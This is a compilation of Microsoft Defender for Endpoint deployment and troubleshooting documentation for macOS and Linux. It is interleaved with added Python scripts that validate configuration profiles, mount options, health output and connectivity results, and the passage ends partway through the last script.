JAMF doesn't have built-in support for content filtering policies, which are a
prerequisite for enabling the network extensions that Microsoft Defender for
Endpoint on macOS installs on the device. Furthermore, JAMF sometimes changes
the content of the policies being deployed. As such, the following steps provide a
workaround that involves signing the configuration profile.

1. Save the following content to your device as com.microsoft.network-extension.mobileconfig
using a text editor:

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft Corporation</string>
<key>PayloadIdentifier</key>
<string>DA2CC794-488B-4AFF-89F7-6686A7E7B8AB</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender Network Extension</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<key>PayloadUUID</key>
<string>2BA070D9-2233-4827-AFC1-1F44C8C8E527</string>
<key>PayloadType</key>
<string>com.apple.webcontent-filter</string>
<key>PayloadOrganization</key>
<string>Microsoft Corporation</string>
<key>PayloadIdentifier</key>
<string>CEBF7A71-D9A1-48BD-8CCF-BD9D18EC155A</string>
<key>PayloadDisplayName</key>
<string>Approved Network Extension</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>FilterType</key>
<string>Plugin</string>
<key>UserDefinedName</key>
<string>Microsoft Defender Network Extension</string>
<key>PluginBundleID</key>
<string>com.microsoft.wdav</string>
<key>FilterSockets</key>
<true/>
<key>FilterDataProviderBundleIdentifier</key>
<string>com.microsoft.wdav.netext</string>
<key>FilterDataProviderDesignatedRequirement</key>
<string>identifier "com.microsoft.wdav.netext" and anchor
apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */
and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and
certificate leaf[subject.OU] = UBF8T346G9</string>
</dict>
</array>
</dict>
</plist>
2. Verify that the above content was copied correctly into the file by running the
plutil utility in terminal:

Bash

$ plutil -lint <PathToFile>/com.microsoft.network-extension.mobileconfig

For example, if the file was stored in Documents:

Bash

$ plutil -lint ~/Documents/com.microsoft.network-extension.mobileconfig

3. Verify that the command outputs OK

Bash

<PathToFile>/com.microsoft.network-extension.mobileconfig: OK

4. Follow the JAMF documentation to create a signing certificate using JAMF's built-in
certificate authority.

5. After the certificate is created and installed to your device, run the following
command from terminal to sign the file:

Bash

$ security cms -S -N "<CertificateName>" -i <PathToFile>/com.microsoft.network-extension.mobileconfig -o <PathToSignedFile>/com.microsoft.network-extension.signed.mobileconfig

For example, if the certificate name is SigningCertificate and the signed file is going to
be stored in Documents:

Bash

$ security cms -S -N "SigningCertificate" -i ~/Documents/com.microsoft.network-extension.mobileconfig -o ~/Documents/com.microsoft.network-extension.signed.mobileconfig

6. From the JAMF portal, navigate to Configuration Profiles and select the Upload
button. Select com.microsoft.network-extension.signed.mobileconfig when
prompted for the file.
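The plutil -lint step above only proves that the file is a well-formed property list; it says nothing about whether the payloads grant what Defender for Endpoint needs, or whether they grant more than that. The following script is an added example, not Microsoft's code: it parses a profile with the standard library's plistlib and checks the two payloads the Intune and JAMF sections above describe (the com.apple.webcontent-filter payload for com.microsoft.wdav.netext and the SystemPolicyAllFiles grant for com.microsoft.wdav.epsext), including the Team ID UBF8T346G9 and the exact form of the designated requirement. It also catches the common copy/paste defect where the /* exists */ comments lose their asterisks. The sample profile it builds is constructed from the payloads on this page; run it against the unsigned .mobileconfig, or against the output of security cms -D for a signed one, since a CMS-signed profile is no longer plain XML.

```python
"""Check a Defender for Endpoint macOS profile beyond what `plutil -lint` verifies.
Added example; bundle IDs and Team ID are from the profiles above, the sample
profile below is constructed for illustration."""
import plistlib
import re

TEAM_ID = "UBF8T346G9"
EPS_EXT = "com.microsoft.wdav.epsext"   # Endpoint Security extension (needs Full Disk Access)
NET_EXT = "com.microsoft.wdav.netext"   # network extension (content filter data provider)

# The designated requirement exactly as the profiles above spell it. "/ exists /"
# is what survives when a renderer eats the asterisks, and it is not valid syntax.
DR_RE = re.compile(
    r'^identifier "(?P<ident>[\w.-]+)" and anchor apple generic and '
    r"certificate 1\[field\.1\.2\.840\.113635\.100\.6\.2\.6\] /\* exists \*/ and "
    r"certificate leaf\[field\.1\.2\.840\.113635\.100\.6\.1\.13\] /\* exists \*/ and "
    r"certificate leaf\[subject\.OU\] = (?P<team>\w+)$")
DR_TEMPLATE = ('identifier "{ident}" and anchor apple generic and '
               "certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and "
               "certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and "
               "certificate leaf[subject.OU] = " + TEAM_ID)


def check_requirement(req: str, expected_ident: str) -> list:
    """Return problems with one designated-requirement string (empty list if fine)."""
    flat = " ".join(req.split())  # the XML may wrap the string across lines
    m = DR_RE.match(flat)
    if not m:
        if "/ exists /" in flat:
            return [f"{expected_ident}: '/* exists */' was mangled to '/ exists /'"]
        return [f"{expected_ident}: requirement does not have the documented form"]
    problems = []
    if m["ident"] != expected_ident:
        problems.append(f"requirement names {m['ident']}, expected {expected_ident}")
    if m["team"] != TEAM_ID:
        problems.append(f"Team ID {m['team']} is not Microsoft's {TEAM_ID}")
    return problems


def validate_profile(data: bytes) -> list:
    """Problems with the network-extension and Full Disk Access payloads; [] means
    the profile grants exactly what the documentation asks for, nothing looser."""
    root = plistlib.loads(data)
    problems = []
    if root.get("PayloadScope") != "System":
        problems.append("PayloadScope must be System")
    if root.get("PayloadRemovalDisallowed") is not True:
        problems.append("PayloadRemovalDisallowed should be true so users cannot remove the profile")
    saw_filter = saw_fda = False
    for payload in root.get("PayloadContent", []):
        ptype = payload.get("PayloadType")
        if ptype == "com.apple.webcontent-filter":
            saw_filter = True
            if payload.get("FilterType") != "Plugin" or payload.get("FilterSockets") is not True:
                problems.append("content filter must be FilterType=Plugin with FilterSockets=true")
            if payload.get("FilterDataProviderBundleIdentifier") != NET_EXT:
                problems.append(f"FilterDataProviderBundleIdentifier is not {NET_EXT}")
            problems += check_requirement(payload.get("FilterDataProviderDesignatedRequirement", ""), NET_EXT)
        elif ptype == "com.apple.TCC.configuration-profile-policy":
            for entry in payload.get("Services", {}).get("SystemPolicyAllFiles", []):
                if entry.get("Identifier") != EPS_EXT or entry.get("IdentifierType") != "bundleID":
                    problems.append(f"SystemPolicyAllFiles grant must target bundle ID {EPS_EXT}")
                    continue
                saw_fda = True
                if entry.get("Allowed") != 1:
                    problems.append("SystemPolicyAllFiles grant does not set Allowed=1")
                problems += check_requirement(entry.get("CodeRequirement", ""), EPS_EXT)
    if not saw_filter:
        problems.append("no com.apple.webcontent-filter payload for the network extension")
    if not saw_fda:
        problems.append(f"no Full Disk Access (SystemPolicyAllFiles) grant for {EPS_EXT}")
    return problems


def sample_profile(mangled: bool = False) -> bytes:
    """Constructed profile mirroring the Intune/JAMF payloads above (sample data)."""
    dr_eps = DR_TEMPLATE.format(ident=EPS_EXT)
    if mangled:  # reproduce the copy/paste defect that drops the asterisks
        dr_eps = dr_eps.replace("/* exists */", "/ exists /")
    return plistlib.dumps({
        "PayloadType": "Configuration", "PayloadScope": "System", "PayloadRemovalDisallowed": True,
        "PayloadContent": [
            {"PayloadType": "com.apple.webcontent-filter", "FilterType": "Plugin",
             "FilterSockets": True, "PluginBundleID": "com.microsoft.wdav",
             "FilterDataProviderBundleIdentifier": NET_EXT,
             "FilterDataProviderDesignatedRequirement": DR_TEMPLATE.format(ident=NET_EXT)},
            {"PayloadType": "com.apple.TCC.configuration-profile-policy",
             "Services": {"SystemPolicyAllFiles": [
                 {"Identifier": EPS_EXT, "IdentifierType": "bundleID",
                  "CodeRequirement": dr_eps, "StaticCode": 0, "Allowed": 1}]}}]})


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else sample_profile()
    for problem in validate_profile(data) or ["profile OK"]:
        print(problem)
```

Pass the path of the unsigned profile as the first argument; with no argument the script validates its own constructed sample. An empty result means the profile contains exactly the two grants, bound to Microsoft's Team ID, and nothing wider.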


Manage system extensions using the
manual methods of deployment
Article • 08/30/2023

This article describes the procedures involved when deploying Microsoft Defender for
Endpoint manually.

Manual deployment

System Extensions
You might see the prompt that's shown in the following screenshot:

1. Select OK. You might get a second prompt as shown in the following screenshot:

2. From this second-prompt screen, select OK. You'll receive a notification message
that reads Installation succeeded, as shown in the following screenshot:

3. On the screen displaying the Installation succeeded notification message, select
OK. You'll return to the following screen:


4. From the menu bar, click the x symbol on the shield. You'll get the options shown
in the following screenshot:

5. Select Action needed. The following screen appears:

6. Click Fix on the top-right corner of this screen. You'll get a prompt, as shown in the
following screenshot:

7. Enter your password and select OK.


8. Click

The System Preferences screen appears.


9. Click Security & Privacy. The Security & Privacy screen appears.

10. Select Click the lock to make changes. You'll get a prompt as shown in the
following screenshot:

11. Enter your password and click Unlock. The following screen appears:

12. Select Details, next to Some system software requires your attention before it
can be used.

13. Check both the Microsoft Defender checkboxes, and select OK. You'll get two
pop-up screens, as shown in the following screenshot:

14. On the "Microsoft Defender" Would like to Filter Network Content pop-up
screen, click Allow.

15. On the Microsoft Defender wants to make changes pop-up screen, enter your
password and select OK.

If you run systemextensionsctl list, the following screen appears:

Accessibility
1. On the Security & Privacy screen, select the Privacy tab.

2. Select Accessibility from the left navigation pane, and click +.


3. From the resultant screen, select Applications from the Favorites pane in the left-
side of the screen; select Microsoft Defender; and then select Open at the
bottom-right of the screen.

4. From the resultant screen, check the Microsoft Defender checkbox.


Full Disk Access


1. On the Security & Privacy screen, select the Privacy tab.

2. Select Full Disk Access from the left navigation pane, and then click the Lock icon.

3. Confirm that the Microsoft Defender extension has full disk access; if not, check the
Microsoft Defender checkbox.

Notifications
1. From the System Preferences home screen, select Notifications.

The Notifications screen appears.

2. Select Microsoft Defender from the left navigation pane.

3. Enable the Allow Notifications option; select Alerts, and retain the default settings
as is.

What a healthy system looks like

mdatp health output


Check the system extensions
In terminal, run the following command to check the system extensions:

systemextensionsctl list

The execution of this command is shown in the following screenshot:



Troubleshoot installation issues for
Microsoft Defender for Endpoint on
Linux
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Verify that the installation succeeded


An error in installation might or might not result in a meaningful error message by the
package manager. To verify if the installation succeeded, obtain and check the
installation logs using:

Bash

sudo journalctl --no-pager|grep 'microsoft-mdatp' > installation.log

Bash

grep 'postinstall end' installation.log

Output

microsoft-mdatp-installer[102243]: postinstall end [2020-03-26 07:04:43 +0000] 102216

Output from the previous command showing the correct date and time of installation
indicates success.

Also check the Client configuration to verify the health of the product and detect the
EICAR text file.

Make sure you have the correct package


Verify that the package you're installing matches the host distribution and version.

Package                          Distribution
mdatp-rhel8.Linux.x86_64.rpm     Oracle, RHEL, and CentOS 8.x
mdatp-sles12.Linux.x86_64.rpm    SUSE Linux Enterprise Server 12.x
mdatp-sles15.Linux.x86_64.rpm    SUSE Linux Enterprise Server 15.x
mdatp.Linux.x86_64.rpm           Oracle, RHEL, and CentOS 7.x
mdatp.Linux.x86_64.deb           Debian and Ubuntu 16.04, 18.04 and 20.04

For manual deployment, make sure the correct distro and version are selected.

Installation failed due to dependency error


If the Microsoft Defender for Endpoint installation fails due to missing dependencies
errors, you can manually download the prerequisite dependencies.

The following external package dependencies exist for the mdatp package:

The mdatp RPM package requires glibc >= 2.17, audit, policycoreutils, semanage,
selinux-policy-targeted, mde-netfilter

For RHEL6 the mdatp RPM package requires audit, policycoreutils, libselinux,
mde-netfilter

For DEBIAN the mdatp package requires libc6 >= 2.23, uuid-runtime, auditd,
mde-netfilter

The mde-netfilter package also has the following package dependencies:

For DEBIAN the mde-netfilter package requires libnetfilter-queue1, libglib2.0-0

For RPM the mde-netfilter package requires libmnl, libnfnetlink, libnetfilter_queue, glib2

Installation failed
Check if the Defender for Endpoint service is running:
Bash

service mdatp status

Output

● mdatp.service - Microsoft Defender for Endpoint


Loaded: loaded (/lib/systemd/system/mdatp.service; enabled; vendor
preset: enabled)
Active: active (running) since Thu 2020-03-26 10:37:30 IST; 23h ago
Main PID: 1966 (wdavdaemon)
Tasks: 105 (limit: 4915)
CGroup: /system.slice/mdatp.service
├─1966 /opt/microsoft/mdatp/sbin/wdavdaemon
├─1967 /opt/microsoft/mdatp/sbin/wdavdaemon
└─1968 /opt/microsoft/mdatp/sbin/wdavdaemon

Steps to troubleshoot if the mdatp service isn't running

1. Check to see if mdatp user exists:

Bash

id "mdatp"

If there's no output, run

Bash

sudo useradd --system --no-create-home --user-group --shell /usr/sbin/nologin mdatp

2. Try enabling and restarting the service using:

Bash

sudo service mdatp start

Bash

sudo service mdatp restart


3. If mdatp.service isn't found upon running the previous command, run:

Bash

sudo cp /opt/microsoft/mdatp/conf/mdatp.service <systemd_path>

where <systemd_path> is /lib/systemd/system for Ubuntu and Debian distributions
and /usr/lib/systemd/system for RHEL, CentOS, Oracle, and SLES. Then rerun step
2.

4. If the above steps don't work, check whether SELinux is installed and in enforcing mode.
If so, try setting it to permissive (preferably) or disabled mode by setting the SELINUX
parameter to permissive or disabled in /etc/selinux/config and rebooting. See the selinux
man page for details. Then try restarting the mdatp service using step 2. Treat this as a
diagnostic step only: revert the change immediately after the test and reboot, because
leaving SELinux in permissive or disabled mode weakens the host.

5. If /opt directory is a symbolic link, create a bind mount for /opt/microsoft .

6. Ensure that the daemon has executable permission.

Bash

ls -l /opt/microsoft/mdatp/sbin/wdavdaemon

Output

-rwxr-xr-x 2 root root 15502160 Mar 3 04:47 /opt/microsoft/mdatp/sbin/wdavdaemon

If the daemon doesn't have executable permissions, make it executable using:

Bash

sudo chmod 0755 /opt/microsoft/mdatp/sbin/wdavdaemon

and retry running step 2.

7. Ensure that the file system containing wdavdaemon isn't mounted with noexec .
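The checks in this article are quick to script once the host facts are in hand. The following Python module is an added example, not Microsoft's code: it picks the package name from /etc/os-release according to the table above, returns the systemd unit directory from step 3, and implements steps 6 and 7 (executable bit, noexec mount) by parsing /proc/mounts with longest-prefix mount-point matching, so that /opt on its own file system is judged by its own options rather than those of /. The os-release and mounts texts embedded at the bottom are constructed sample input; live_daemon_checks() runs the same logic against the real host.

```python
"""Checks from the Linux installation troubleshooting steps above.
Added example, not Microsoft's code. The package table, unit directories and
wdavdaemon path come from this article; the sample inputs are constructed."""
import os
import stat

WDAVDAEMON = "/opt/microsoft/mdatp/sbin/wdavdaemon"


def parse_os_release(text: str) -> dict:
    """Turn /etc/os-release content into a dict (quotes stripped)."""
    kv = {}
    for line in text.splitlines():
        if "=" in line and not line.lstrip().startswith("#"):
            key, value = line.split("=", 1)
            kv[key.strip()] = value.strip().strip('"')
    return kv


def select_package(os_release: str):
    """mdatp package name for this host per the table above, or None when the
    distribution/version is not listed there."""
    info = parse_os_release(os_release)
    distro, version = info.get("ID", "").lower(), info.get("VERSION_ID", "")
    major = version.split(".")[0]
    if distro in ("rhel", "centos", "ol"):  # "ol" is Oracle Linux
        return {"7": "mdatp.Linux.x86_64.rpm", "8": "mdatp-rhel8.Linux.x86_64.rpm"}.get(major)
    if distro == "sles":
        return {"12": "mdatp-sles12.Linux.x86_64.rpm", "15": "mdatp-sles15.Linux.x86_64.rpm"}.get(major)
    if distro == "debian" or (distro == "ubuntu" and version in ("16.04", "18.04", "20.04")):
        return "mdatp.Linux.x86_64.deb"
    return None


def systemd_unit_dir(os_release: str) -> str:
    """Where to copy mdatp.service when systemd cannot find the unit (step 3)."""
    distro = parse_os_release(os_release).get("ID", "").lower()
    return "/lib/systemd/system" if distro in ("debian", "ubuntu") else "/usr/lib/systemd/system"


def mount_options_for(path: str, mounts: str) -> set:
    """Mount options of the file system holding `path`, from /proc/mounts text.
    The longest mount point that is a prefix of the path wins (/opt beats /)."""
    best, opts = "", ""
    for line in mounts.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mnt = fields[1].replace("\\040", " ")  # /proc/mounts escapes spaces as \040
        if (path == mnt or path.startswith(mnt.rstrip("/") + "/")) and len(mnt) > len(best):
            best, opts = mnt, fields[3]
    return set(opts.split(",")) if opts else set()


def daemon_checks(mode: int, mounts: str, path: str = WDAVDAEMON) -> list:
    """Steps 6 and 7: the daemon must be executable and not sit on a noexec mount."""
    findings = []
    if not mode & stat.S_IXUSR:
        findings.append(f"{path} is not executable; run: sudo chmod 0755 {path}")
    if "noexec" in mount_options_for(path, mounts):
        findings.append(f"the file system holding {path} is mounted noexec")
    return findings


def live_daemon_checks(path: str = WDAVDAEMON) -> list:
    """Run daemon_checks against this host (needs the package installed)."""
    with open("/proc/mounts") as fh:
        mounts = fh.read()
    return daemon_checks(os.stat(path).st_mode, mounts, path)


# Constructed sample input: an Ubuntu 20.04 host whose /opt is mounted noexec.
SAMPLE_OS_RELEASE = 'NAME="Ubuntu"\nID=ubuntu\nVERSION_ID="20.04"\n'
SAMPLE_MOUNTS = ("/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0\n"
                 "/dev/sdb1 /opt xfs rw,noexec,relatime 0 0\n"
                 "tmpfs /run tmpfs rw,nosuid,nodev,noexec 0 0\n")

if __name__ == "__main__":
    print("package:", select_package(SAMPLE_OS_RELEASE))
    print("unit dir:", systemd_unit_dir(SAMPLE_OS_RELEASE))
    for finding in daemon_checks(0o100755, SAMPLE_MOUNTS):
        print("finding:", finding)
```

A distribution outside the table (for example Ubuntu 22.04) yields None rather than a guess, which is the point: pick the package from the supported list rather than the nearest-looking one.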

If the Defender for Endpoint service is running, but the EICAR text file detection doesn't work

1. Check the file system type using:

Bash

findmnt -T <path_of_EICAR_file>

Currently supported file systems for on-access activity are listed here. Any files
outside these file systems aren't scanned.

Command-line tool mdatp isn't working


1. If running the command-line tool mdatp gives an error command not found , run the
following command:

Bash

sudo ln -sf /opt/microsoft/mdatp/sbin/wdavdaemonclient /usr/bin/mdatp

and try again.

If none of the above steps help, collect the diagnostic logs:

Bash

sudo mdatp diagnostic create

Output

Diagnostic file created: <path to file>

The path to a zip file that contains the logs is displayed as output. Reach out to
our customer support with these logs.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Investigate agent health issues
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

The following table provides information on the values returned when you run the mdatp
health command and their corresponding descriptions.

automatic_definition_update_enabled
    True if automatic antivirus definition updates are enabled, false otherwise.

cloud_automatic_sample_submission_consent
    Current sample submission level. Can be one of the following values:
    None: No suspicious samples are submitted to Microsoft.
    Safe: Only suspicious samples that don't contain personally identifiable
    information (PII) are submitted automatically. This is the default value for
    this setting.
    All: All suspicious samples are submitted to Microsoft.

cloud_diagnostic_enabled
    True if optional diagnostic data collection is enabled, false otherwise. For more
    information related to Defender for Endpoint and other products and services like
    Microsoft Defender Antivirus and Windows, see Microsoft Privacy Statement.

cloud_enabled
    True if cloud-delivered protection is enabled, false otherwise.

conflicting_applications
    List of applications that are possibly conflicting with Microsoft Defender for
    Endpoint. This list includes, but isn't limited to, other security products and
    other applications known to cause compatibility issues.

definitions_status
    Status of antivirus definitions.

definitions_updated
    Date and time of last antivirus definition update.

definitions_updated_minutes_ago
    Number of minutes since last antivirus definition update.

definitions_version
    Antivirus definition version.

edr_client_version
    Version of the EDR client running on the device.

edr_configuration_version
    EDR configuration version.

edr_device_tags
    List of tags associated with the device.

edr_group_ids
    Group ID that the device is associated with.

edr_machine_id
    Device identifier used in Microsoft Defender XDR.

engine_version
    Version of the antivirus engine.

healthy
    True if the product is healthy, false otherwise.

licensed
    True if the device is onboarded to a tenant, false otherwise.

log_level
    Current log level for the product.

machine_guid
    Unique machine identifier used by the antivirus component.

network_protection_status
    Status of the network protection component (macOS only). Can be one of the
    following values:
    starting - Network protection is starting
    failed_to_start - Network protection couldn't be started due to an error
    started - Network protection is currently running on the device
    restarting - Network protection is currently restarting
    stopping - Network protection is stopping
    stopped - Network protection isn't running

org_id
    Organization that the device is onboarded to. If the device isn't yet onboarded to
    any organization, this prints unavailable. For more information on onboarding, see
    Onboard to Microsoft Defender for Endpoint.

passive_mode_enabled
    True if the antivirus component is set to run in passive mode, false otherwise.

product_expiration
    Date and time when the current product version reaches end of support.

real_time_protection_available
    True if the real-time protection component is healthy, false otherwise.

real_time_protection_enabled
    True if real-time antivirus protection is enabled, false otherwise.

real_time_protection_subsystem
    Subsystem used to serve real-time protection. If real-time protection isn't
    operating as expected, this prints unavailable.

release_ring
    Release ring. For more information, see Deployment rings.

Component specific health


You can get more detailed health information for individual Defender for Endpoint
features with mdatp health --details <feature>. For example:

Bash

mdatp health --details edr

Output

edr_early_preview_enabled                   : "disabled"
edr_device_tags                             : []
edr_group_ids                               : ""
edr_configuration_version                   : "20.199999.main.2022.10.25.03-514032a834557bdd31ac415be6df278d9c2a4c25"
edr_machine_id                              : "a47ba049f43319ac669b6291ce73275cd445c9cd"
edr_sense_guid                              : "298a1a8c-04dd-4929-8efd-3bb14cb54b94"
edr_preferred_geo                           : "unitedstates"

You can run mdatp health --help on recent versions to list all supported features.
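In a fleet, nobody reads mdatp health by eye; the table above is what a monitoring check keys on. The following Python module is an added example, not Microsoft's code: parse_health() turns the key : value lines into a dict (the values are printed in JSON-like syntax, so true, numbers, "strings" and [lists] decode naturally, and anything else is kept as a raw string), and assess() applies the semantics the table gives for healthy, licensed/org_id, the real-time protection fields, passive mode, cloud_enabled, definitions_updated_minutes_ago, conflicting_applications and network_protection_status. The one-day definitions threshold is my choice, not a product default, and the sample output is constructed (real field names, made-up values). live_health() runs the real command on a host.

```python
"""Parse `mdatp health` output and flag the values that matter, per the table above.
Added example, not Microsoft's code. Field names are the documented ones; the
threshold and the sample output are mine (constructed)."""
import json
import subprocess

# Age beyond which definitions count as stale (my choice, not a product default).
MAX_DEFINITION_AGE_MINUTES = 24 * 60


def parse_health(text: str) -> dict:
    """Parse the `key : value` lines printed by `mdatp health`. Values that are
    valid JSON (true/false, numbers, "strings", [lists]) are decoded; the rest
    stay raw strings. Only the first colon separates key from value, so
    timestamps such as "12:00:00 PM" survive intact."""
    health = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep or not key.strip():
            continue
        value = value.strip()
        try:
            health[key.strip()] = json.loads(value)
        except ValueError:
            health[key.strip()] = value
    return health


def assess(health: dict, max_def_age: int = MAX_DEFINITION_AGE_MINUTES) -> list:
    """(code, message) findings for an unhealthy or misconfigured agent."""
    findings = []
    if health.get("healthy") is not True:
        findings.append(("unhealthy", "healthy is not true; run `mdatp health --details <feature>` to narrow it down"))
    if health.get("licensed") is not True or health.get("org_id") in (None, "", "unavailable"):
        findings.append(("not_onboarded", "device is not onboarded to a tenant (licensed/org_id)"))
    if health.get("real_time_protection_enabled") is not True:
        findings.append(("rtp_disabled", "real-time protection is disabled"))
    if health.get("real_time_protection_subsystem") == "unavailable":
        findings.append(("rtp_subsystem", "real-time protection subsystem is unavailable"))
    if health.get("passive_mode_enabled") is True:
        findings.append(("passive_mode", "antivirus runs in passive mode; another AV is expected to be primary"))
    if health.get("cloud_enabled") is not True:
        findings.append(("cloud_disabled", "cloud-delivered protection is disabled"))
    age = health.get("definitions_updated_minutes_ago")
    if isinstance(age, int) and age > max_def_age:
        findings.append(("definitions_stale", f"definitions are {age} minutes old"))
    conflicts = health.get("conflicting_applications") or []
    if conflicts:
        findings.append(("conflicts", "conflicting applications: " + ", ".join(map(str, conflicts))))
    if health.get("network_protection_status") == "failed_to_start":
        findings.append(("network_protection", "network protection failed to start (macOS)"))
    return findings


def live_health() -> dict:
    """Run `mdatp health` on this host and parse it."""
    out = subprocess.run(["mdatp", "health"], capture_output=True, text=True, check=True).stdout
    return parse_health(out)


# Constructed sample output: real field names, made-up values.
SAMPLE_HEALTH = """\
healthy                                     : false
licensed                                    : true
org_id                                      : "00000000-0000-0000-0000-000000000000"
release_ring                                : "Production"
product_expiration                          : "Mar 31, 2024 at 12:00:00 PM"
cloud_enabled                               : true
cloud_automatic_sample_submission_consent   : "safe"
passive_mode_enabled                        : false
real_time_protection_enabled                : false
real_time_protection_available              : true
real_time_protection_subsystem              : "unavailable"
automatic_definition_update_enabled         : true
definitions_updated_minutes_ago             : 2880
definitions_version                         : "1.403.1234.0"
edr_machine_id                              : "a47ba049f43319ac669b6291ce73275cd445c9cd"
conflicting_applications                    : ["clamd"]
network_protection_status                   : "failed_to_start"
"""

if __name__ == "__main__":
    for code, message in assess(parse_health(SAMPLE_HEALTH)):
        print(f"[{code}] {message}")
```

Each finding carries a stable code, so the output can feed a monitoring system directly; a healthy, onboarded host with fresh definitions returns an empty list.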

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .


Troubleshoot cloud connectivity issues
for Microsoft Defender for Endpoint on
Linux
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Run the connectivity test


To test if Defender for Endpoint on Linux can communicate to the cloud with the current
network settings, run a connectivity test from the command line:

Bash

mdatp connectivity test

Expected output:

Output

Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]


Testing connection with https://eu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://wu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
Testing connection with https://winatp-gw-cus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-weu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-neu.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-ukw.microsoft.com/test ... [OK]
Testing connection with https://winatp-gw-uks.microsoft.com/test ... [OK]
Testing connection with https://eu-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://us-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://uk-v20.events.data.microsoft.com/ping ...
[OK]
Testing connection with https://v20.events.data.microsoft.com/ping ... [OK]
If the connectivity test fails, check if the device has Internet access and if any of the
endpoints required by the product are blocked by a proxy or firewall.

Failures with curl error 35 or 60 indicate certificate pinning rejection. Check whether the
connection is subject to SSL or HTTPS inspection. If so, exempt the Microsoft Defender for
Endpoint endpoints from inspection by adding them to the inspection allowlist.

Troubleshooting steps for environments without proxy or with transparent proxy

To test that a connection isn't blocked in an environment without a proxy or with a
transparent proxy, run the following command in the terminal:

Bash

curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'

The output from this command should be similar to:

Output

OK https://x.cp.wd.microsoft.com/api/report
OK https://cdn.x.cp.wd.microsoft.com/ping

Troubleshooting steps for environments with static proxy

Warning

PAC, WPAD, and authenticated proxies are not supported. Ensure that only a static
proxy or transparent proxy is being used.

SSL inspection and intercepting proxies are also not supported for security reasons.
Configure an exception for SSL inspection and your proxy server to directly pass
through data from Defender for Endpoint on Linux to the relevant URLs without
interception. Adding your interception certificate to the global store will not allow
for interception.
If a static proxy is required, add a proxy parameter to the above command, where
proxy_address:port correspond to the proxy address and port:

Bash

curl -x http://proxy_address:port -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'

Ensure that you use the same proxy address and port as configured in the
/lib/systemd/system/mdatp.service file. Check your proxy configuration if there are
errors from the above commands.

To set the proxy for mdatp, use the following command:

Bash

mdatp config proxy set --value http://address:port

Upon success, attempt another connectivity test from the command line:

Bash

mdatp connectivity test

If the problem persists, contact customer support.
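The connectivity test output and the proxy rules above are easy to get wrong in a hurry, so the following Python module, an added example and not Microsoft's code, does the triage: parse_connectivity() reads the "Testing connection with ... [OK]" lines, summarize() lists the failing hosts, flags TLS inspection when a curl error 35 or 60 is present, and produces the complete hostname list to hand to the proxy or firewall team, and validate_static_proxy() rejects the values the Warning above rules out (credentials, a PAC file, a missing port or scheme) before they reach mdatp config proxy set. Only the success line format is shown on this page; how a failing line is rendered is an assumption here (a status other than OK in the brackets, optionally followed by "curl error N"), and the sample output is constructed.

```python
"""Triage `mdatp connectivity test` output and sanity-check a static proxy URL.
Added example, not Microsoft's code. Failing-line rendering is assumed (see
SAMPLE_OUTPUT); the sample output is constructed."""
import re
from urllib.parse import urlsplit

LINE_RE = re.compile(r"Testing connection with (?P<url>\S+) \.\.\. \[(?P<status>[A-Za-z]+)\](?P<rest>.*)")
CURL_ERR_RE = re.compile(r"curl error[:\s]+(\d+)", re.IGNORECASE)
PINNING_ERRORS = {35, 60}  # curl exit codes the article attributes to pinning rejection


def parse_connectivity(text: str) -> list:
    """One dict per tested endpoint: url, host, ok, curl_error (or None)."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        err = CURL_ERR_RE.search(m["rest"])
        results.append({
            "url": m["url"],
            "host": urlsplit(m["url"]).hostname,
            "ok": m["status"].upper() == "OK",
            "curl_error": int(err.group(1)) if err else None,
        })
    return results


def summarize(results: list) -> dict:
    """Failed hosts, whether TLS inspection is the likely cause, and the full
    hostname list to hand to the proxy/firewall team."""
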